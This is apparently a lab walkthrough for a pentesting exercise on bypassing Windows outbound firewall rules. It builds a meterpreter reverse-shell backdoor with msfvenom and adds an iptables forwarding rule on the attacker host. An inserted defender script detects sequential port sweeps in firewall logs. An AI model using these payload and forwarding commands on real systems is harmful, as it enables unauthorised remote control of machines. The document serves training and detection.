walkthrough-2328.pdf
Name: Firewall Bypass: Automatic Outbound Open Port Detection
URL: https://attackdefense.com/challengedetails?cid=2328
Type: Basic Exploitation: Pentesting
Important Note:
This document illustrates all the important steps required to complete this lab.
This is by no means a comprehensive step-by-step solution for this exercise. This is only
provided as a reference to various commands needed to complete this exercise and for your
further research on this topic. Also, note that the IP addresses and domain names might be
different in your lab.
Switch to “Target Machine”
Step 1:
Verify Windows firewall outbound port configuration.
Open “Windows Defender Firewall with Advanced Security”
We can see that outbound ports 4444 to 6009 are blocked. In other scenarios the port range
could be different. The objective of this challenge is therefore to gain a reverse shell using the
windows/meterpreter/reverse_tcp_allports payload.
About reverse_tcp_allports payload:
“Inject the meterpreter server DLL via the Reflective DLL Injection payload (staged). Try to connect back to the attacker, on all possible ports (1-65535, slowly)”
Source:
https://www.rapid7.com/db/modules/payload/windows/meterpreter/reverse_tcp_allports/
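As an added defender-side example (not part of this walkthrough), the sequential connect-back behaviour quoted above is visible in host firewall logs. The script below parses constructed Windows Firewall log lines, assuming the standard pfirewall.log field order, and flags any source/destination pair whose outbound destination ports form a consecutive run, reporting the first port the firewall let through.

```python
"""Flag outbound sequential port walks (the reverse_tcp_allports pattern) in
Windows Firewall log lines. Added example; the log lines are constructed."""
from collections import defaultdict

# Constructed sample in pfirewall.log field order (action=f[2], proto=f[3], src=f[4], dst=f[5], dport=f[7], path=f[16]).
SAMPLE_LOG = """\
#Fields: date time action protocol src-ip dst-ip src-port dst-port size tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path
2024-05-01 10:00:01 DROP TCP 10.0.31.5 10.0.31.200 49720 4444 52 S 0 0 0 - - - SEND
2024-05-01 10:00:02 DROP TCP 10.0.31.5 10.0.31.200 49721 4445 52 S 0 0 0 - - - SEND
2024-05-01 10:00:03 DROP TCP 10.0.31.5 10.0.31.200 49722 4446 52 S 0 0 0 - - - SEND
2024-05-01 10:00:04 DROP TCP 10.0.31.5 10.0.31.200 49723 4447 52 S 0 0 0 - - - SEND
2024-05-01 10:00:05 DROP TCP 10.0.31.5 10.0.31.200 49724 4448 52 S 0 0 0 - - - SEND
2024-05-01 10:00:06 ALLOW TCP 10.0.31.5 10.0.31.200 49725 6010 52 S 0 0 0 - - - SEND
2024-05-01 10:00:07 ALLOW TCP 10.0.31.7 10.0.31.50 49800 443 52 S 0 0 0 - - - SEND
2024-05-01 10:00:08 ALLOW TCP 10.0.31.7 10.0.31.50 49801 80 52 S 0 0 0 - - - SEND
"""

def parse_lines(text):
    """Yield (src_ip, dst_ip, dst_port, action) for outbound TCP records."""
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        f = line.split()
        if len(f) < 17 or f[3] != "TCP" or f[16] != "SEND":
            continue
        yield f[4], f[5], int(f[7]), f[2]

def find_port_walks(records, min_run=5):
    """Return {(src, dst): (first_port, last_port, escaped_port)} for pairs whose
    destination ports contain a run of >= min_run consecutive values; escaped_port
    is the first connection for that pair the firewall allowed (None if none)."""
    by_pair = defaultdict(list)
    for src, dst, port, action in records:
        by_pair[(src, dst)].append((port, action))
    hits = {}
    for pair, seq in by_pair.items():
        ports = sorted({p for p, _ in seq})
        run_start, best = ports[0], (ports[0], ports[0])
        for prev, cur in zip(ports, ports[1:]):
            if cur != prev + 1:
                run_start = cur  # gap in the sequence: start a new run
            if cur - run_start > best[1] - best[0]:
                best = (run_start, cur)
        if best[1] - best[0] + 1 >= min_run:
            escaped = next((p for p, a in seq if a != "DROP"), None)
            hits[pair] = (best[0], best[1], escaped)
    return hits

if __name__ == "__main__":
    for (src, dst), (lo, hi, out) in find_port_walks(parse_lines(SAMPLE_LOG)).items():
        print(f"{src} -> {dst}: walked ports {lo}-{hi}, first allowed port {out}")
```

Logging of allowed connections must be enabled on the host for the escaped port to appear; with only dropped connections logged, the run of drops alone still flags the pair.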
Step 2:
Generating reverse_tcp_allports payload.
Command:
sudo msfvenom -p windows/meterpreter/reverse_tcp_allports LHOST=10.0.31.200 LPORT=4444 -f exe > backdoor.exe
We have generated a reverse_tcp_allports payload. When backdoor.exe is run on the target
machine, it tries to connect back to the attacker machine starting at port 4444 rather than at
port 1, because we set LPORT to 4444, so the port sweep starts from there.
Step 3:
In this scenario, we know that outbound ports 4444 to 6009 are blocked. So we need to set an
iptables rule on the attacker machine that forwards connections arriving on port 6010 to port
4444, which is where our Metasploit multi handler is listening for the reverse connection.
Applying iptable rules on the attacker machine.
Command:
sudo iptables -A PREROUTING -t nat -i eth0 -p tcp --dport 4444:6010 -j DNAT --to-destination 10.0.31.200:4444
sudo iptables --table nat --list